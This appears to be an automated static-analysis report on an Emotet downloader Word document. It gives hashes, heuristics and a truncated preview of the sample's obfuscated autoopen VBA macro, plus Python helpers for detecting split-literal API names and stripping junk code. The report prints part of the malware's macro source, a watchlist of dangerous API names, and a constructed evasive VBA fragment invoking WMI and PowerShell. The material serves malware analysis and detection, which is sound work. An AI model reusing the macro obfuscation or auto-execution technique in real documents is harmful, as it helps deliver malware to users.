Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9eb5dc9a514e0328…

MALICIOUS

Office (OLE)

Size: 213.8 KB
Created: 2019-04-17 12:38:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 58df25adb99c4d4e64d23f069b394b0d
SHA-1: 9bccacd997c1475d2328bd278567a0bbceddd887
SHA-256: 9eb5dc9a514e032803096d8efe435a829fdc2b94d01d0fe871db4cb47193c744
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

ClamAV identifies the sample with a signature for an Emotet downloader document. The critical heuristics add an obfuscated reference to 'Win32_Process' (the WMI process-creation class) and an auto-executing macro ('autoopen') that uses GetObject, the usual way a macro reaches WMI without calling CreateObject; together these point to the macro spawning a child process rather than merely running script. The macro's structure matches Emotet's downloader stage, which fetches and executes the next payload. Two caveats from the evidence below: the visible part of the extracted source is almost entirely junk (comparisons between never-assigned variables and an always-true `If 2251 < 75720`), so the only live statement in `autoopen` is the call to `TQAAUU`, and the download logic must sit in the truncated remainder; and the only URL recovered statically is the benign OOXML schema namespace, so no payload or C2 URL is available from static analysis alone. The legacy WordBasic marker entry states that no VBA project was recovered, which the extracted macros.bas contradicts, so treat that finding as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6944694-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6944694-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
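The OLE_VBA_SPLIT_KEYWORD_OBFUSCATION heuristic above is easy to reproduce once you see that the hidden name exists only after VBA's `&`/`+` concatenation is performed. The following Python is an added example written for this page, not the scanner's own implementation: it finds every run of concatenated string literals (including runs broken by a `_` line continuation), joins them, and reports watchlist names that appear in the joined text but in no single literal. The VBA fragment is constructed for the example, and the two WMI entries on the watchlist are an assumption based on the summary's Win32_Process finding.

```python
import re

# Constructed VBA fragment (not taken from the sample on this page) using the
# split-literal trick that OLE_VBA_SPLIT_KEYWORD_OBFUSCATION describes.
SAMPLE_VBA = r'''
Sub autoopen()
    Dim o As Object
    Set o = GetObject("win" & "mgmts" & ":" & "win32_" & "Process")
    x = "WSc" + "ript" + "." + "Sh" + "ell"
    y = "power" & "sh" & _
        "ell -enc AAA"
    z = "plain string"
End Sub
'''

# Names worth reassembling. The first four come from the heuristic text above; the
# two WMI names are an assumption based on the summary's Win32_Process finding.
WATCHLIST = [
    "Scripting.FileSystemObject", "WScript.Shell", "powershell", "URLDownloadToFile",
    "winmgmts", "Win32_Process",
]

LITERAL = r'"((?:[^"]|"")*)"'
# Two or more literals joined by & or +, allowing a "_" line continuation after the operator.
CONCAT_RUN = re.compile(LITERAL + r'(?:\s*[&+]\s*(?:_\s*\r?\n\s*)?' + LITERAL + r')+')


def reassemble_runs(vba_src):
    """Return a list of (line_number, joined_string) for every concatenation run."""
    runs = []
    for m in CONCAT_RUN.finditer(vba_src):
        parts = re.findall(LITERAL, m.group(0))          # inner text of each literal
        joined = "".join(p.replace('""', '"') for p in parts)
        line = vba_src.count("\n", 0, m.start()) + 1
        runs.append((line, joined))
    return runs


def find_split_keywords(vba_src, watchlist=WATCHLIST):
    """Return (line, name, reassembled) for watchlist names that appear only after
    concatenation and never inside any single literal: the split exists to hide them."""
    singles = {lit.lower() for lit in re.findall(LITERAL, vba_src)}
    hits = []
    for line, joined in reassemble_runs(vba_src):
        for name in watchlist:
            needle = name.lower()
            if needle in joined.lower() and not any(needle in s for s in singles):
                hits.append((line, name, joined))
    return hits


if __name__ == "__main__":
    for line, name, joined in find_split_keywords(SAMPLE_VBA):
        print(f"line {line}: {name!r} reassembled from split literals -> {joined!r}")
```

Run it on the decoded `macros.bas` that olevba extracts rather than on the raw OLE stream, since the literals are only contiguous in source form. A name that also occurs intact somewhere in the file is deliberately not reported: the point of the heuristic is that the split is the only place the name exists.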

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31306 bytes
SHA-256: 0b825be6e3a7b8395f820dffcde5ca530167740536da66ee02648f6352573814
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GUowxw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "i_CAAXAA"
Attribute VB_Base = "0{E0B61789-8FB0-4859-BA02-4FDAB805CFF1}{C8D6B9CF-BFFA-401C-A39A-B022830F0F3A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ZAGkAAQ"
Attribute VB_Base = "0{8CF91DFC-5EF2-400F-979B-2378B955DEC8}{BFB07D59-98F4-44B0-B34B-984365C16FB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w_kAACk"
Sub autoopen()
   If PAAAXwXx = sDACAQ1 Then
    dZAUcU = 565861361 * hAAZoA1B
  ElseIf tCBBUAU = oABG4GG1 Then
    Set v_AA1UU = Z4GABAG
  ElseIf iQA4BBk_ = hAXkAkA Then
   f1_GQx = EXxxCQ / rUAoQXA * YB1ZQA + Sqr(WQGwoQB)
  ElseIf C1AAUAZZ = m1AAZk4A Then
   iAAQBZx = 16884796
End If
   If NCZACDU_ = o4Q1k_Xx Then
    fxoABo = 991396442 * rUwUokUA
  ElseIf sBZADAZB = rAAUAD Then
    Set iDAkAU = dAoAUAc
  ElseIf lDDAAA = HACAAAQ Then
   DoQAZABA = k1QxACU / HAB1AB * UDQBDAAQ + Sqr(OX1QAAA)
  ElseIf TAx1Uk = WwBxA4AX Then
   mDxAAAQD = 731891826
End If
TQAAUU
   If RA1Axc = H_GoUBZ Then
    HAxZBZZU = 24950626 * fDQQQkA
  ElseIf lo41wAUA = PAAAAx Then
    Set aAA4cXA = jkD4AAAc
  ElseIf lAXD4cU = SDZQB_A Then
   GoUUAB = TUAcX1xB / PAwA1AQ * I4QAwDAB + Sqr(RBDAA4)
  ElseIf SAQZcA = wCZ4ABc Then
   IBBCA1_ = 638403160
End If
   If QBZGxQUX = I1oA_oCw Then
    oAAQUQcD = 859712332 * dBABAA
  ElseIf BABUAAA1 = P4BAAk Then
    Set wCwAAA4G = jDAAXQc
  ElseIf EAZGZQDB = aQAA4D Then
   LAZDAA4 = M_U1ADAA / PAxwQkZ * X1AAAAQB + Sqr(oAAAAoDA)
  ElseIf UxAX4_U = lcAAAwQ Then
   zwAQUAAU = 248777835
End If
   If jAGABA = UBA1C44A Then
    qXwkACc = 590564566 * nAGAAAA
  ElseIf vBoQDQ = PAxcC4 Then
    Set iDB1UA = icQAAA
  ElseIf KZAxCA = WoGCDGA Then
   NcGBkB_1 = FcADAA / WUCkACXB * QwAXQX_G + Sqr(EAAUUw)
  ElseIf jQAQwoU = GAUGAAUc Then
   ww4oco = 530200646
End If
End Sub

Attribute VB_Name = "wAUAAAX"
Function TQAAUU()
On Error Resume Next
   If Sk4BxA = LUcABCD Then
    cAAXAZkA = 730702975 * jABAcxXC
  ElseIf u_GQQAAo = iGAXZAA Then
    Set aQ1UAAB = qQAAAA
  ElseIf wGDB1AC = wADwBk Then
   AA4DQA = dAAUwAUQ / NoDXBD_ * iQxAAAAA + Sqr(ZXxkAA)
  ElseIf KxAXBADB = pAA4DG Then
   cAAAAAAZ = 425581763
End If
   If W4QXABox = ZXBAABAZ Then
    hQwxAX = 800862908 * rkDAAA
  ElseIf RAC_QC = wABAwBA Then
    Set EADQBk = zBAkxAo_
  ElseIf dCBoBAAU = TA11Dk Then
   LDZAXBQ = MCAUAQA / ZwAAAA * aXAZQok + Sqr(RAAQck)
  ElseIf V_4Zw1QA = fAAwA4A Then
   Fo_AwwA = 198761607
End If
If 2251 < 75720 Then
XGUDBBZ = vbFalse
   If kAGQkwo = bGx_AQ Then
    coDkAQQ = 323844 * VQwCAAA
  ElseIf PA1wAAA = t4BBAxU_ Then
    Set hAAQCQ = vBDBXACx
  ElseIf iXDADA = dBAXwBG Then
   QADDAU = fD1UxoAZ / cCUADUUw * lAZoAQ + Sqr(IAwZQDAA)
  ElseIf cGAUQA = uUQCCw Then
   JAoUA_wo = 329878278
End If
   If HABABBGD = fQBAAC Then
    qAXAX_A = 137232580 * FQkA_Uw4
  ElseIf BcQZABCQ = S_c1xA4 Then
    Set FXABoAD = P_UAAA4
  ElseIf jQ4QD1Z = oAABQAA Then
   iAAwoZ4 = G4ADUXU / rBAADAAB * mGZ4AA + Sqr(s_ADAoCD)
  ElseIf jDDABk = oAQw4A Then
   nGAxAQU = 519921364
End If
   If pcUQDBAD = wZwXQAU Then
    QAAAAAkA = 340000337 * LZAUQDAk
  ElseIf DAAoAkx = dAAUCZ Then
    Set t4CC_QXk = qUAo4ZA
  ElseIf UXGADk = fBQDAA Then
   aAQ4ZAQG = FoGBAA / nAwAoA * fBUAoQGc + Sqr(mGUAAck)
  ElseIf VDAUAU = lGUAAAQ_ Then
   RADwGZUU = 23452286
End If
End If
   If kQAAAoB4 = kAU4Uc4U Then
    kQAoAAQ = 916715594 * kACkUA
  ElseIf wxDQUAcA = Gx_xAU Then
    Set aXZQDG = CAQAA_
  ElseIf YwDABCoA = p
... (truncated)
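Every `If`/`ElseIf` block in the preview above compares two variables that are never assigned anywhere in the module, so VBA evaluates `Empty = Empty` and the branch bodies only assign more junk; `If 2251 < 75720 Then` is a constant-true wrapper. Stripping those blocks mechanically is the first thing to do before reading the truncated remainder. The Python below is an added example for this page, not a tool used by the report: it collects the identifiers that are actually assigned (plus Sub/Function names), drops any `If` block whose conditions reference only never-assigned identifiers, unwraps constant-true comparisons, and leaves everything else untouched. The input is an excerpt of the preview above, cut to one junk block per routine; the surviving lines are the real control flow, with `TQAAUU` as the only call left in `autoopen`.

```python
import re

# Excerpt of the macro preview on this page, shortened to one junk block per routine.
MACRO = '''Sub autoopen()
   If PAAAXwXx = sDACAQ1 Then
    dZAUcU = 565861361 * hAAZoA1B
  ElseIf tCBBUAU = oABG4GG1 Then
    Set v_AA1UU = Z4GABAG
  ElseIf iQA4BBk_ = hAXkAkA Then
   f1_GQx = EXxxCQ / rUAoQXA * YB1ZQA + Sqr(WQGwoQB)
  ElseIf C1AAUAZZ = m1AAZk4A Then
   iAAQBZx = 16884796
End If
TQAAUU
End Sub

Function TQAAUU()
On Error Resume Next
If 2251 < 75720 Then
XGUDBBZ = vbFalse
   If kAGQkwo = bGx_AQ Then
    coDkAQQ = 323844 * VQwCAAA
  ElseIf PA1wAAA = t4BBAxU_ Then
    Set hAAQCQ = vBDBXACx
End If
End If
End Function
'''

IDENT = re.compile(r'[A-Za-z_][A-Za-z0-9_]*')
ASSIGN = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=', re.IGNORECASE)
PROC = re.compile(r'^\s*(?:Sub|Function)\s+([A-Za-z_]\w*)', re.IGNORECASE)
IF_LINE = re.compile(r'^\s*(If|ElseIf)\s+(.*?)\s+Then\s*$', re.IGNORECASE)
END_IF = re.compile(r'^\s*End\s+If\s*$', re.IGNORECASE)
ELSE = re.compile(r'^\s*Else\s*$', re.IGNORECASE)
CONST_CMP = re.compile(r'^\s*(\d+)\s*(<>|<=|>=|=|<|>)\s*(\d+)\s*$')
# Builtins that may appear in a condition without being assigned by the macro.
KEYWORDS = {'and', 'or', 'not', 'true', 'false', 'sqr', 'abs', 'len',
            'vbfalse', 'vbtrue', 'empty', 'null', 'nothing'}


def assigned_names(src):
    """Identifiers that ever receive a value: LHS of '=' / 'Set x =' plus procedure names."""
    names = set()
    for line in src.splitlines():
        for rx in (ASSIGN, PROC):
            m = rx.match(line)
            if m:
                names.add(m.group(1).lower())
    return names


def classify(cond, assigned):
    """'const_true'/'const_false' for numeric literal comparisons; 'junk' when every
    identifier in the condition is never assigned (so it compares Empty with Empty);
    otherwise 'keep'."""
    m = CONST_CMP.match(cond)
    if m:
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        result = {'=': a == b, '<>': a != b, '<': a < b,
                  '>': a > b, '<=': a <= b, '>=': a >= b}[op]
        return 'const_true' if result else 'const_false'
    idents = [t.lower() for t in IDENT.findall(cond) if t.lower() not in KEYWORDS]
    if idents and not any(i in assigned for i in idents):
        return 'junk'
    return 'keep'


def strip_junk(src):
    """Remove junk If-blocks and constant-true wrappers, keeping all other lines verbatim."""
    assigned = assigned_names(src)
    out, stack = [], []            # stack entries: 'keep' | 'drop' | 'unwrap'
    for line in src.splitlines():
        dropping = 'drop' in stack
        m = IF_LINE.match(line)
        if m and m.group(1).lower() == 'if':
            kind = 'drop' if dropping else classify(m.group(2), assigned)
            if kind == 'keep':
                out.append(line)
            stack.append({'keep': 'keep', 'const_true': 'unwrap'}.get(kind, 'drop'))
            continue
        if END_IF.match(line):
            if stack.pop() == 'keep':
                out.append(line)
            continue
        if m or ELSE.match(line):                 # ElseIf / Else of the innermost block
            if stack[-1] == 'keep':
                out.append(line)
            elif stack[-1] == 'unwrap':
                stack[-1] = 'drop'                # branches after an always-true If are dead
            continue
        if not dropping:
            out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    print(strip_junk(MACRO))
```

The pass is deliberately conservative: a condition that mentions even one assigned variable (or a builtin such as `vbFalse` next to an assigned name) is kept, so anything the real payload branches on survives. Dead assignments such as `XGUDBBZ = vbFalse` are left in place; they are cheap to read and removing them would require tracking uses, which is not the point here.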